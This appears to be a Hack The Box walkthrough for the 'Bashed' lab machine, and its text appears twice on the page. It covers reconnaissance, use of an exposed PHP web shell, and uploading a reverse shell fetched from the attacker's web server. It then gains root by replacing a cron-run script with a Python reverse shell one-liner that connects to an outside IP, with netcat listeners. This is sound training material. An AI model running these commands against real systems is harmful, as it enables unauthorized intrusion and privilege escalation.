Bashed

PreviousVaccine NextBlue

Last updated 2 years ago

Was this helpful?

Bashed

HTB 8. Bashed

nmap -A -T4 -p- 10.10.10.68 shows port 80 with Apache httpd 2.4.18 (Ubuntu).
searchsploit apache 2.4 reveals local apache_ctl exploit.
Going to website 10.10.10.68 and looking at content shows that 10.10.10.68/uploads. exists.
dirbuster time with medium wordlist which reveals several folders.
View source code of pages shows nothing.
dirbuster found dev/phpbash.php.
Go to 10.10.10.68 and launch phpbash.php which launches web terminal.
whoami is www-data so lets get the user flag. cat /home/arrexel/user.txt.
test sudo -l and history which shows we can become scriptmanager user without password.
Can't change to scriptmanager because we are in a wbeshell without a tty.
cd /var/www/html/uploads/ and upload payload.
Lets try from pentestmonkey instead of metasploit. Download and extract.
Edit the $ip and $port to our ip and port 1234.
Start web server python -m SimpleHTTPServer 80 and run wet http://10.10.14.21/rev.php on the target.
Start netcat nc -nvlp 1234
Go to 10.10.10.68/uploads/rev.php to execute and connect.
Still can't access tty so serach for tty escape and go to to .
Just go down the list and try the options. Try python -c 'import pty; pty.spawn("/bin/bash")' and no we are in bash.
sudo su scriptmanager does not work so lets try running a command as the user sudo -u scriptmanager /bin/bash.
whoami is scripmanager and history is none.
ls -la / shows scriptmanager owns /scripts.
cd scripts and ls -la shows test.py and test.txt.
The time modified for the test.txt changes every minute so a cronjob is running the test.py evvery minute as root. Lets change the test.py so it performs malicious actions.
Search for python reverse shell and use the .
Use import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); (-i is interactive mode) and download to target.
Start listening nc -nvlp 2345 and wait for shell.

Someone exploited with CVE-2017-16995 found after running the linux-exploit-suggester.

PreviousVaccine NextBlue

Last updated 2 years ago

Was this helpful?

HTB 8. Bashed

nmap -A -T4 -p- 10.10.10.68 shows port 80 with Apache httpd 2.4.18 (Ubuntu).
searchsploit apache 2.4 reveals local apache_ctl exploit.
Going to website 10.10.10.68 and looking at content shows that 10.10.10.68/uploads. exists.
dirbuster time with medium wordlist which reveals several folders.
View source code of pages shows nothing.
dirbuster found dev/phpbash.php.
Go to 10.10.10.68 and launch phpbash.php which launches web terminal.
whoami is www-data so lets get the user flag. cat /home/arrexel/user.txt.
test sudo -l and history which shows we can become scriptmanager user without password.
Can't change to scriptmanager because we are in a wbeshell without a tty.
cd /var/www/html/uploads/ and upload payload.
Lets try from pentestmonkey instead of metasploit. Download and extract.
Edit the $ip and $port to our ip and port 1234.
Start web server python -m SimpleHTTPServer 80 and run wet http://10.10.14.21/rev.php on the target.
Start netcat nc -nvlp 1234
Go to 10.10.10.68/uploads/rev.php to execute and connect.
Still can't access tty so serach for tty escape and go to to .
Just go down the list and try the options. Try python -c 'import pty; pty.spawn("/bin/bash")' and no we are in bash.
sudo su scriptmanager does not work so lets try running a command as the user sudo -u scriptmanager /bin/bash.
whoami is scripmanager and history is none.
ls -la / shows scriptmanager owns /scripts.
cd scripts and ls -la shows test.py and test.txt.
The time modified for the test.txt changes every minute so a cronjob is running the test.py evvery minute as root. Lets change the test.py so it performs malicious actions.
Search for python reverse shell and use the .
Use import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); (-i is interactive mode) and download to target.
Start listening nc -nvlp 2345 and wait for shell.

Someone exploited with CVE-2017-16995 found after running the linux-exploit-suggester.